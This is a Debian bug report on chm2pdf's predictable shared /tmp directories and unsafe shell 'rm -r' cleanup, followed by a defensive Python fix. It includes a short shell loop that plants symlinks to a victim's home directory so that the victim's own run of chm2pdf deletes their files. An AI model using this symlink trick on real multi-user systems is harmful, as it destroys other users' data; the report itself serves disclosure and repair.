Package: chm2pdf
Version: 0.9-2
Severity: grave
Justification: causes non-serious data loss

There are several problems with this package:

1. chm2pdf creates /tmp/chm2pdf/{orig,work}/X directories
   (where X is the file basename, foo for foo.chm).

   This makes the script unusable for other users, i.e. userA runs chm2pdf,
   which creates /tmp/chm2pdf owned by userA, and userB has no chance to
   create files there.


2. A malicious user could prepare a directory structure which, upon chm2pdf
   execution, could cause serious data loss.

from /usr/bin/chm2pdf:

     CHM2PDF_TEMP_WORK_DIR='/tmp/chm2pdf/work' 
     CHM2PDF_TEMP_ORIG_DIR='/tmp/chm2pdf/orig'
...
     CHM2PDF_WORK_DIR = CHM2PDF_TEMP_WORK_DIR + os.sep + basename
     CHM2PDF_ORIG_DIR = CHM2PDF_TEMP_ORIG_DIR + os.sep + basename
...
     os.system('rm -r '+CHM2PDF_ORIG_DIR+'/*')
     os.system('rm -r '+CHM2PDF_WORK_DIR+'/*')
.

A malicious user could do, e.g.:

malicious$ mkdir /tmp/chm2pdf/{orig,work}
malicious$ cd /tmp/chm2pdf/orig
malicious$ for f in `find /home/victim/ -iname \*.chm -print`; do
> ln -s /home/victim/ `basename ${f%%.chm}`
> done

And ask user victim to convert any of his own .chm files.


Thanks.

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.27-rc7
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash

Versions of packages chm2pdf depends on:
ii  htmldoc                     1.8.27-3     HTML processor that generates inde
ii  libchm-bin                  2:0.39-9     library for dealing with Microsoft
ii  python                      2.5.2-2      An interactive high-level object-o
ii  python-chm                  0.8.4-0.1+b1 Python binding for CHMLIB
ii  python-support              0.8.4        automated rebuilding support for P

chm2pdf recommends no packages.

chm2pdf suggests no packages.

-- no debconf information
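
One way to avoid both problems in the report above, as an added example that is not part of the original report or of chm2pdf's own code: create the working directories under a private, unpredictable root and clean up without a shell glob. The function names are hypothetical and "foo" is a constructed basename.

```python
import os
import shutil
import stat
import tempfile


def make_private_dirs(basename):
    """Create per-run orig/work directories under an unpredictable root."""
    # mkdtemp creates a new directory with mode 0700 and a random suffix,
    # so nothing another user pre-created in /tmp is ever reused.
    root = tempfile.mkdtemp(prefix="chm2pdf-")
    orig_dir = os.path.join(root, "orig", basename)
    work_dir = os.path.join(root, "work", basename)
    os.makedirs(orig_dir)
    os.makedirs(work_dir)
    return root, orig_dir, work_dir


def is_safe_dir(path):
    """True only for a real directory we own that others cannot write to."""
    try:
        st = os.lstat(path)  # lstat: a planted symlink is not followed
    except OSError:
        return False
    return (stat.S_ISDIR(st.st_mode)
            and st.st_uid == os.geteuid()
            and not st.st_mode & 0o022)


def cleanup(root):
    """Remove the per-run tree without a shell and without following links."""
    # rmtree refuses a symlinked root and unlinks symlinks found inside the
    # tree instead of descending into their targets.
    shutil.rmtree(root)


if __name__ == "__main__":
    root, orig_dir, work_dir = make_private_dirs("foo")  # constructed basename
    print(orig_dir, work_dir, is_safe_dir(root))
    cleanup(root)
```

is_safe_dir is only needed if a fixed, pre-existing directory must be reused; with make_private_dirs each run and each user gets its own tree.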


